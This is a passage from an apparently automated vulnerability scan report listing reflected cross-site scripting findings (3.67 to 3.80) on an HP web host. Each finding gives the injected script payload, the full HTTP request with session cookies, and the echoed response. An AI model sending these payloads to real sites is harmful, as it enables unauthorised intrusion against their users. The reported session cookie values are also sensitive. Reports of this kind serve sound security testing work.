...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources8c727"><script>alert(1)</script>83474b9d897/scripts/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.67. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/powered_utils.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37d5c"><script>alert(1)</script>d1b7c146211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts37d5c"><script>alert(1)</script>d1b7c146211/powered_utils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:23 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30488


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts37d5c"><script>alert(1)</script>d1b7c146211/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.68. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/powered_utils.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727af"><script>alert(1)</script>fc4b8abf13a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/powered_utils.js727af"><script>alert(1)</script>fc4b8abf13a?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:23 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30681


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/powered_utils.js727af"><script>alert(1)</script>fc4b8abf13a?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.69. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/prototype.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0614"><script>alert(1)</script>cb5479040c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesa0614"><script>alert(1)</script>cb5479040c2/scripts/prototype.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30748


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesa0614"><script>alert(1)</script>cb5479040c2/scripts/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.70. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/prototype.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f724"><script>alert(1)</script>4700926501a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts1f724"><script>alert(1)</script>4700926501a/prototype.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:07 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30560


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts1f724"><script>alert(1)</script>4700926501a/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.71. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/prototype.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fbb7"><script>alert(1)</script>b36781bc679 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/prototype.js1fbb7"><script>alert(1)</script>b36781bc679?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:10 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/prototype.js1fbb7"><script>alert(1)</script>b36781bc679?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.72. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/scriptaculous.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef85"><script>alert(1)</script>e6810596064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources2ef85"><script>alert(1)</script>e6810596064/scripts/scriptaculous.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30965


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources2ef85"><script>alert(1)</script>e6810596064/scripts/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.73. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/scriptaculous.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0912"><script>alert(1)</script>9ac4d4ffdf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsa0912"><script>alert(1)</script>9ac4d4ffdf2/scriptaculous.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:07 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30576


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsa0912"><script>alert(1)</script>9ac4d4ffdf2/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.74. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/scriptaculous.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd3e"><script>alert(1)</script>922b4e83789 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/scriptaculous.js8fd3e"><script>alert(1)</script>922b4e83789?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:10 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/scriptaculous.js8fd3e"><script>alert(1)</script>922b4e83789?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.75. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/slider.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ecd"><script>alert(1)</script>f7e231bf138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources40ecd"><script>alert(1)</script>f7e231bf138/scripts/slider.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:57 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31025


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources40ecd"><script>alert(1)</script>f7e231bf138/scripts/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.76. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/slider.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f565d"><script>alert(1)</script>1b065f7549d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsf565d"><script>alert(1)</script>1b065f7549d/slider.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30803


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf565d"><script>alert(1)</script>1b065f7549d/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.77. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/slider.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24576"><script>alert(1)</script>64b6d3570f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/slider.js24576"><script>alert(1)</script>64b6d3570f3?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30751


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/slider.js24576"><script>alert(1)</script>64b6d3570f3?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.78. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/sound.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87a9"><script>alert(1)</script>b864179465a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesd87a9"><script>alert(1)</script>b864179465a/scripts/sound.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:21 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesd87a9"><script>alert(1)</script>b864179465a/scripts/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.79. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/sound.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cebe6"><script>alert(1)</script>cd545bc9316 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptscebe6"><script>alert(1)</script>cd545bc9316/sound.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:21 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30393


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscebe6"><script>alert(1)</script>cd545bc9316/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.80. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/sound.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26bb"><script>alert(1)</script>16e93b14366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/sound.jsc26bb"><script>alert(1)</script>16e93b14366?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
